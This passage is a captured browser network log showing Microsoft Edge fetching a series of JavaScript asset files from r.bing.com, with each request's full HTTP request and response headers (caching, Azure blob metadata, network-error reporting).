cache-control: public, no-transform, max-age=102091
expires: Fri, 01 Mar 2024 19:53:20 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/1Fv2ZQvZTbMVx7KoU_6WkFwvTJ4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CPpe1fm6/eTVMJ7HzEtYBw==
last-modified: Wed, 25 Oct 2023 09:55:04 GMT
etag: 0x8DBD54076B12B4C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f664fc7b-201e-00a3-02cb-4e20ef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=323111
expires: Mon, 04 Mar 2024 09:17:00 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/y1tiMssL1_ZRGIkBjxDYmR2kX8o.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Mu+4u1+ZO0orsL04es/kgA==
last-modified: Wed, 17 Aug 2022 07:04:56 GMT
etag: 0x8DA801ECA858075
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fb2677c7-b01e-000e-70a6-b8c9e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 171
cache-control: public, no-transform, max-age=103627
expires: Fri, 01 Mar 2024 20:18:56 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9b5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/8w26ODmd1hk4C30WJtfkdBYFSfE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: RyGzYQ1bPsIUh6P5T7D2GQ==
last-modified: Sat, 04 Jun 2022 00:11:59 GMT
etag: 0x8DA45BED7C5BCF7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bb627c93-b01e-0045-0f2a-6690c9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.8fb20f17.1708833100.219ff040
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, max-age=157747
expires: Sat, 02 Mar 2024 11:20:56 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626d9ea
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/VJnSxYcv7TZB-im7xvuwo7wcIGs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: UvI1LPdtimSVdpANXFeGvw==
last-modified: Wed, 26 Jul 2023 08:27:06 GMT
etag: 0x8DB8DB218E65A17
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ed2a66f-c01e-003d-20e6-593331000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=166374
expires: Sat, 02 Mar 2024 13:44:43 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626da43
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/PrQ373ob8GVFmIUI5rk5UyOqdPQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: MuMZXAYyC4MnSLuqz0M1JQ==
last-modified: Wed, 16 Nov 2022 08:59:33 GMT
etag: 0x8DAC7B0E1654D0D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d097d254-401e-006e-4125-4b1005000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=59915
expires: Fri, 01 Mar 2024 08:10:24 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626da44
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/IEsUJAq41KbrXKW7f2nmdJPCUXs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rG7VUMX4iQJJxBP5sPK0bw==
last-modified: Tue, 04 Oct 2022 19:01:21 GMT
etag: 0x8DAA63AD3576FC3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ba520123-101e-0028-5542-c681f9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=81101
expires: Fri, 01 Mar 2024 14:03:30 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626da45
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/Xs0bcRwli50H_9_TOsfurmNnZ64.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: cwdNdlabWDC1hjuwYmzczw==
last-modified: Tue, 29 Aug 2023 06:54:02 GMT
etag: 0x8DBA85CBAD2C1A2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d20d647e-d01e-0008-19d1-2cfa5e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1225
cache-control: public, no-transform, max-age=277223
expires: Sun, 03 Mar 2024 20:32:12 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626da68
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/J8voVglUisJUijfuGyqMw30mmuM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: D9bC7VUzAxFx2U36LZTz1w==
last-modified: Tue, 06 Feb 2024 03:14:33 GMT
etag: 0x8DC26C1BDE0CE82
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fae3bb92-301e-0006-44eb-5d7695000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1110
cache-control: public, no-transform, max-age=152233
expires: Sat, 02 Mar 2024 09:49:02 GMT
date: Thu, 29 Feb 2024 15:31:49 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220709.626da69
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/uiannz55FdT0j3p9jGwegfI5aIY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DBE54BA00D29CE
akamai-grn: 0.2518dd58.1707562093.25d727ec
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: ptBK2hTyGWd8WoHQJD3Ggw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1372b69a-601e-0032-6770-17e026000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 337
cache-control: public, no-transform, max-age=251956
expires: Sun, 03 Mar 2024 13:31:06 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd06
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: R0hRHsurcD1pLX+6Vf4lXQ==
last-modified: Wed, 17 Aug 2022 06:57:26 GMT
etag: 0x8DA801DBE7E5F85
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c040d3ae-801e-00bc-7ac9-323690000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=283112
expires: Sun, 03 Mar 2024 22:10:22 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd04
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/SDeE6NKJQCkfNK6cB0GHg-KiEns.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 4a3fKAPxT8n6JSY4NlwK9Q==
last-modified: Thu, 11 Jan 2024 22:51:23 GMT
etag: 0x8DC12F7D61A2E2B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0694edad-001e-0022-2282-478035000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1067
cache-control: public, no-transform, max-age=90273
expires: Fri, 01 Mar 2024 16:36:23 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd08
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: tKwiLIkqXc7DBP/w/Yf4QA==
last-modified: Wed, 14 Jun 2023 23:28:08 GMT
etag: 0x8DB6D2F033D59BC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e8aac3d4-801e-00de-6357-0df4b7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 868
cache-control: public, no-transform, max-age=313998
expires: Mon, 04 Mar 2024 06:45:08 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd09
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ydDuUFvQrnTEDpvE14Ya7abrPGk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: H3YmaXLcYy8AIvzcWWecOQ==
last-modified: Tue, 03 Oct 2023 11:46:19 GMT
etag: 0x8DBC4065C22CBF4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d66536e0-501e-003f-1f12-638d89000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=102077
expires: Fri, 01 Mar 2024 19:53:07 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd0a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/6uiJaf2fPzSDV7i5NIaa4424Xuk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: OTiHEpNEPnGPKWJyO6LSfQ==
last-modified: Wed, 17 Aug 2022 06:31:16 GMT
etag: 0x8DA801A1703A3B7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9b269eb8-e01e-00f7-414e-eacac3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=86978
expires: Fri, 01 Mar 2024 15:41:28 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd0b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/IMqjT7QyrugA4se9um3IMRZO93c.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: br
content-md5: e8o72fCkQwkU95GMyH4alQ==
last-modified: Wed, 17 Aug 2022 06:57:34 GMT
etag: 0x8DA801DC34A0813
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 51caeea4-001e-009d-7fa4-2d12eb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=146172
expires: Sat, 02 Mar 2024 08:08:02 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd0c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/hx1FP91l4PKrDhCLfXHf3ouMwSg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: i3+74iaaQaJfuR0cI8bPcg==
last-modified: Fri, 09 Feb 2024 11:57:56 GMT
etag: 0x8DC29665AAA96C7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a885eda5-001e-006f-680b-634fd9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=102045
expires: Fri, 01 Mar 2024 19:52:35 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd0d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:92.123.128.139:443RequestGET /rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: oqLg+91b3FmpcS7e8iKMsQ==
last-modified: Thu, 09 Nov 2023 08:38:27 GMT
etag: 0x8DBE0FF3E5BA097
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a4e9387d-201e-000c-0f36-2a7759000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1143
vary: Accept-Encoding
akamai-grn: 0.4b281102.1709103712.91dc7a5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=276767
expires: Sun, 03 Mar 2024 20:24:37 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.8b777b5c.1709220710.626dd05
timing-allow-origin: *
-
Remote address:92.123.128.139:443RequestGET /rp/wrZP3EgNVYrorH3c6R47Sruy0OM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Hld4hrLTgdOY14/WVAnFqg==
last-modified: Wed, 17 Aug 2022 05:39:53 GMT
etag: 0x8DA8012E93D38A8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 00ad33ed-101e-00e3-476e-0582ac000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 488
cache-control: public, no-transform, max-age=60866
expires: Fri, 01 Mar 2024 08:26:16 GMT
date: Thu, 29 Feb 2024 15:31:50 GMT
vary: Accept-Encoding
